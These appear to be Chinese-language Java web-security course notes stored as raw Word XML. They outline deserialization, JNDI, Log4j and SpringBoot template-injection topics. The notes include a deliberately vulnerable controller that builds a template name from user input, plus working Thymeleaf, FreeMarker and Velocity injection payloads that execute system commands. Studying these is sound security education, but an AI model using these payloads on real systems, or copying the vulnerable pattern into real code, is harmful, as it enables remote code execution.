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6B7D" w14:textId="77777777" w:rsidR="001022E2" w:rsidRDefault="001022E2" w:rsidP="001022E2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开发</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-JavaEE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&amp;SpringBoot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>栈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模版注入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Thymeleaf&amp;Freemarker&amp;Velocity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E37526" w14:textId="0C66DC05" w:rsidR="001022E2" w:rsidRDefault="001022E2" w:rsidP="001022E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E9EB0F4" wp14:editId="2C7E82A6">
            <wp:extent cx="5274310" cy="1901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0B5F" w14:textId="77777777" w:rsidR="001022E2" w:rsidRDefault="001022E2" w:rsidP="001022E2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反射机制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-JavaEE-readObject&amp;toString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-JavaEE-FastJson-JdbcRowSetImpl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-LADP&amp;RMI&amp;DNS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手工原理等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第三方依赖开发安全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&amp;FastJson&amp;XStream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-JavaEE-Shiro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&amp;Log4j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日志处理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-SpringBoot&amp;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-Thymeleaf&amp;Freemarker&amp;Velocity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024B09D1" w14:textId="77777777" w:rsidR="001022E2" w:rsidRDefault="001022E2" w:rsidP="001022E2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13C44349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-JavaEE-Servlet&amp;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生命周期</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B560F60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过滤器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Filter&amp;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监听器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Listen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F98CE22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-JavaEE-Maven&amp;JDBC&amp;Mybatis&amp;Hibernate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0428DCBA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-JavaEE-ORM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预编译</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA86E0A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类加载器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反射机制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安全问题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E923E64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成员变量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构造方法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成员方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B70441E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动态代理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</w:p>
    <w:p w14:paraId="3CF1F8CF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利用链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危险方法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重写方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E2E2BC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原生反序列化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&amp;URLDNS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00210F5B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-JavaEE-FastJson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&amp;JDBC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0F56CD5C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-JavaEE-JNDI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&amp;LDAP&amp;RMI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服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1010F7DA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第三方依赖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-FastJson&amp;XStream</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7601153B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第三方依赖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-Shrio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验证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&amp;Log4j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日志</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22985CD2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-SpringBoot&amp;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传参</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2DAEFE" w14:textId="77777777" w:rsidR="001022E2" w:rsidRDefault="001022E2" w:rsidP="001022E2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模版引擎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FF"/>
        </w:rPr>
        <w:t>Thymeleaf&amp;Freemarker&amp;Velocity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559F23C8" w14:textId="77777777" w:rsidR="001022E2" w:rsidRDefault="001022E2" w:rsidP="001022E2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DD4A68"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/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-SpringBoot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https://springdoc.cn/spring-boot/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、路由映射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@RequestMapping @GetMapping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、参数传递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@RequestParam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、数据响应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@RestController @Controller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@RestController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注解相当于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@ResponseBody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@Controller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合作用。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#Thymeleaf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https://xz.aliyun.com/news/9962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、新建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SpringBoot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Web,Thymeleaf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application.properties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修改缓存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、创建模版目录和文件，文件定义修改变量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、新建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Controller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目录及文件，指定路由配置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、更换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SpringBoot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Thymeleaf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@Controller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public class IndexController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@RequestMapping("/index")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String index(Model model)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替换模版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文件中的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变量值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model.addAttribute("data", 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你好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小迪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index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return "index";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@RequestMapping("/indexs")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public String index(Model model,@RequestParam String lang)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替换模版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文件中的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变量值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model.addAttribute("data", "Hello xiaodi");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index+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lang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    return "index-"+lang;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利用条件：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Thymeleaf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漏洞版本，可控模版变量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__$%7bnew%20java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(%22calc.exe%22).getInputStream()).next()%7d__::.x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#Freemarker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https://mp.weixin.qq.com/s/TtNxfSYsB4HMEpW_OBniew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、新建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SpringBoot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Web,Freemarker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application.properties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修改缓存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、创建模版目录和文件，文件定义修改变量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、新建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Controller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目录及文件，指定路由配置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、更换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SpringBoot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Freemarker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&lt;#assign value="freemarker.template.utility.Execute"?new()&gt;${value("calc.exe")}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&lt;#assign value="freemarker.template.utility.ObjectConstructor"?new()&gt;${value("java.lang.ProcessBuilder","calc.exe").start()}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&lt;#assign value="freemarker.template.utility.JythonRuntime"?new()&gt;${value("calc.exe")}&lt;@value&gt;import os;os.system("calc.exe")&lt;/@value&gt;//@value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为自定义标签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利用条件：可控渲染的模版文件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#Velocity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https://blog.csdn.net/2401_83799022/article/details/141600988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&lt;groupId&gt;org.apache.velocity&lt;/groupId&gt;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&lt;artifactId&gt;velocity&lt;/artifactId&gt;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   &lt;version&gt;1.7&lt;/version&gt;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&lt;/dependency&gt;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Velocity.evaluate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template.merge(ctx, out)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%23set($e%3D"e")$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("calc")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利用条件：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Velocity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漏洞版本，可控模版变量或文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552CA3DE" w14:textId="77777777" w:rsidR="001022E2" w:rsidRDefault="001022E2" w:rsidP="001022E2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2C97714A" w14:textId="77777777" w:rsidR="001022E2" w:rsidRDefault="001022E2" w:rsidP="001022E2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3AB4346C" w14:textId="77777777" w:rsidR="009427F3" w:rsidRPr="001022E2" w:rsidRDefault="009427F3"/>
    <w:sectPr w:rsidR="009427F3" w:rsidRPr="00102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A8C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1CE003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54"/>
    <w:rsid w:val="001022E2"/>
    <w:rsid w:val="004B3054"/>
    <w:rsid w:val="0094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14BD0-88D9-494A-AA85-932B209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1022E2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22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2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22E2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02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2025-03-06T13:27:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-03-06T13:27:00Z</dcterms:modified>
</cp:coreProperties>
</file>